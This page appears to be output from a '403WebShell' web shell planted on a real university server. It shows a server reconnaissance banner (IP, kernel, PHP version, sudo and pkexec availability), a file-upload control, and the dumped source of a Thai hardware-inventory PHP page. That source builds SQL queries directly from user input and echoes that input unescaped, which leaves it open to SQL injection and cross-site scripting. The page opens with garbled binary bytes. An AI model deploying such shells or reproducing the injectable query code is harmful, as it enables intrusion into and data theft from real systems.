403WebShell

h( )($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms��Sb�,;R''6c2I�!\��kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K��x)1�6@r*2�89ma��&��'ti��{~#��t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1��w�r��l&-t*3�<<�u��#��j&.u��J68\8?"#$%&'()*+,-./0 !
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell403Webshell

Server IP : 10.254.12.21 / Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON | cURL : ON | WGET : OFF | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /proc/5801/root/var/www/html/hardware/pages/

Upload File :

[ Back ]

Current File : /proc/5801/root/var/www/html/hardware/pages/index-2023-10-01.php

<?php
/* ob_start();
 header( "location: http://arit.skru.ac.th/arit/IntroForm_Search.php" );
 exit(0);*/
?>
<?
session_start();
?>
<?php //include 'check_mode_login.php';?>
<?php include 'dbconnect.php';?>
<?php include 'header.php';?>

<?php
	$pagetitle_text = "รายการครุภัณฑ์";

	$strKeyword = null;

	if(isset($_POST["txtKeyword"]))
	{
		$strKeyword = $_POST["txtKeyword"];
	}
	if(isset($_GET["txtKeyword"]))
	{
		$strKeyword = $_GET["txtKeyword"];
	}
	
	$sid = null;

	if(isset($_POST["sid"]))
	{
		$sid = $_POST["sid"];
	}
	if(isset($_GET["sid"]))
	{
		$sid = $_GET["sid"];
	}	
	
	if ($strKeyword <>"") {
		$pagetitle_text .= " เกี่ยวกับ " . $strKeyword;
	} elseif ($sid<>"") {
		$sql = "SELECT * FROM hardware_mis_type WHERE hardware_type_code='" . $sid . "'";
		$query = mysqli_query($conn,$sql);
		$result=mysqli_fetch_array($query,MYSQLI_ASSOC);
		$pagetitle_text .= " ประเภท " . $sid . " : " . $result["hardware_type_name"];
	} else {
		$pagetitle_text .= " ทุกประเภท";
	}
?>	
<!--<br />
<img src="ebsco_logo_color.png" height="30" />
&nbsp;&nbsp;&nbsp;<img src="gale_logo.png" height="30" />-->
<?php
	/*if($db_id=="dbe002") {
?>
<img src="ebsco_logo_color.png" height="30" />
<?php	
	} elseif($db_id=="dbe003") { //if($db_id="dbe002") {
?>
<img src="gale_logo.png" height="30" />
<?php	
	} //if($db_id="dbe002") { */
?>
                        <h1 class="page-header"><?php echo $pagetitle_text;?><!--&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="index.php"><button type="button" class="btn btn-warning">ดูทุกหมวด</button></a>&nbsp;&nbsp;&nbsp;<a href="repair_add.php"><button type="button" class="btn btn-primary">แจ้งซ่อม</button></a>--></h1>		

<form name="frmSearch" method="post" action="<?php echo $_SERVER['SCRIPT_NAME'];?>">
  <table width="599" border="0">
    <tr>
      <th>คำค้น
      <input name="txtKeyword" type="text" id="txtKeyword" value="<?php echo $strKeyword;?>">
      <input type="submit" value="Search"></th>
    </tr>
  </table>
</form>
<BR>

<?php	
	/* $sql = "SELECT donate_detail.donate_detail_id, donate_detail.donate_number, donate_detail.send_date, donate_detail.send_name, donate_detail.organization, dbook.dbook_id, dbook.title, dbook.author, dbook.amount, dbook.file_amount, dbook_type.dbook_type_name, dbook_status.dbook_status_name,dbook.dbook_status_id";
	$sql .= " FROM ((dbook INNER JOIN dbook_status ON dbook.dbook_status_id = dbook_status.dbook_status_id) INNER JOIN dbook_type ON dbook.dbook_type_id = dbook_type.dbook_type_id) INNER JOIN donate_detail ON dbook.donate_detail_id = donate_detail.donate_detail_id";
	$sql .= " WHERE ( (dbook.title LIKE '%" . $strKeyword . "%')";
	$sql .= " OR (dbook.author LIKE '%" . $strKeyword . "%')";
	$sql .= " OR (donate_detail.donate_number LIKE '%" . $strKeyword . "%')";
	$sql .= " OR (donate_detail.send_name LIKE '%" . $strKeyword . "%')";
	$sql .= " OR (donate_detail.organization LIKE '%" . $strKeyword . "%') )";
	$sql .= " ORDER BY dbook.dbook_id DESC"; */
	
	//$sql = "SELECT * FROM book_detail WHERE (database_id='" . $db_id . "')";
	//$sql .= " WHERE (database_id='db0001')";
	//$sql = "SELECT * FROM book_detail WHERE (database_id<>'')";
	//$sql = "SELECT * FROM hardware_have_picture";
	$sql = "SELECT * FROM hardware_mis";
	if ($sid <> "") {
		if ($sid<>"sut0000") {
			$sql .= " WHERE (hardware_type_code ='" . $sid . "')";
		}
		/*} else {
			$sql .= " AND (type_code ='')";
		}*/
	} elseif ($strKeyword <> "") {
		$sql .= " WHERE ( (assetcode LIKE '%" . $strKeyword . "%')";
		$sql .= " OR (remark LIKE '%" . $strKeyword . "%')";
		$sql .= " OR (assetnamex LIKE '%" . $strKeyword . "%')";
		$sql .= " OR (spec LIKE '%" . $strKeyword . "%') )";
	}
	//$sql .= " ORDER BY book_id ASC";
	//$sql .= " GROUP BY noid";
	$sql .= " ORDER BY assetcode ASC";

	$query = mysqli_query($conn,$sql);

	$num_rows = mysqli_num_rows($query);

	$per_page = 50;   // Per Page
	$page  = 1;
	
	if(isset($_GET["Page"]))
	{
		$page = $_GET["Page"];
	}

	$prev_page = $page-1;
	$next_page = $page+1;

	$row_start = (($per_page*$page)-$per_page);
	if($num_rows<=$per_page)
	{
		$num_pages =1;
	}
	else if(($num_rows % $per_page)==0)
	{
		$num_pages =($num_rows/$per_page) ;
	}
	else
	{
		$num_pages =($num_rows/$per_page)+1;
		$num_pages = (int)$num_pages;
	}

	$row_end = $per_page;

	$sql .= " LIMIT $row_start ,$row_end";
	$query = mysqli_query($conn,$sql);


?>
                                <table class="table table-striped table-bordered table-hover">
                                    <thead>
                                        <tr>
										<th><div align="center">เลขครุภัณฑ์</div></th>
                                        <th><div align="center">เลขครุภัณฑ์เดิม</div></th>
										<th><div align="center">รูปภาพ</div></th>
                                        <th><div align="center">ชื่อครุภัณฑ์</div></th>
										<th><div align="center">ยี่ห้อ/รุ่น</div></th>
										<th><div align="center">สถานที่</div></th>
										<th><div align="center">หน่วยนับ</div></th>
										<th><div align="center">ราคา</div></th>
										<th><div align="center">วันที่รับ</div></th>
										<th><div align="center">งบประมาณ</div></th>
                                        </tr>
                                    </thead>
                                <tbody>
<?php
while($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
{
?>
                                    <tr>
										<td><?php echo $result["assetcode"];?></td>	
										<td><?php echo $result["remark"];?></td>
										<td>
<?php
	$sql3 = "SELECT id,file_name FROM hardware_have_picture WHERE noid='" . $result["remark"] . "'";
	$query3 = mysqli_query($conn,$sql3);
	while($result3=mysqli_fetch_array($query3,MYSQLI_ASSOC)) {
?>										
												<p><a href="<?php echo "hardware_picture/" . $result3["id"] . "/" . $result3["file_name"];?>" target="_blank"><img src="<?php echo "hardware_picture/" . $result3["id"] . "/" . $result3["file_name"];?>" width ="200"/></a></p>
<?php
	} //while($result3=mysqli_fetch_array($query2,MYSQLI_ASSOC))
?>
										</td>
										<td><?php echo $result["assetnamex"];?></td>
										<td><?php echo $result["spec"];?></td>
										<td><?php echo $result["text205"];?></td>
										<td><?php echo $result["unitidx"];?></td>
										<td><?php echo $result["dr"];?></td>
										<td><?php echo $result["receive_date"];?></td>
										<td><?php echo $result["budgetgroupidx"];?></td>
                                    </tr>
<?php
}
?>									
                                </tbody>
                            </table>
                            <!-- /.table-responsive -->

<br>
Total <?php echo $num_rows;?> Record : <?php echo $num_pages;?> Page :
<?php
if($prev_page)
{
	echo " <a href='$_SERVER[SCRIPT_NAME]?Page=$prev_page&txtKeyword=$strKeyword&sid=$sid'><< Back</a> ";
}

for($i=1; $i<=$num_pages; $i++){
	if($i != $page)
	{
		echo "[ <a href='$_SERVER[SCRIPT_NAME]?Page=$i&txtKeyword=$strKeyword&sid=$sid'>$i</a> ]";
	}
	else
	{
		echo "<b> $i </b>";
	}
}
if($page!=$num_pages)
{
	echo " <a href ='$_SERVER[SCRIPT_NAME]?Page=$next_page&txtKeyword=$strKeyword&sid=$sid'>Next>></a> ";
}							
?>
<BR><BR><BR>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit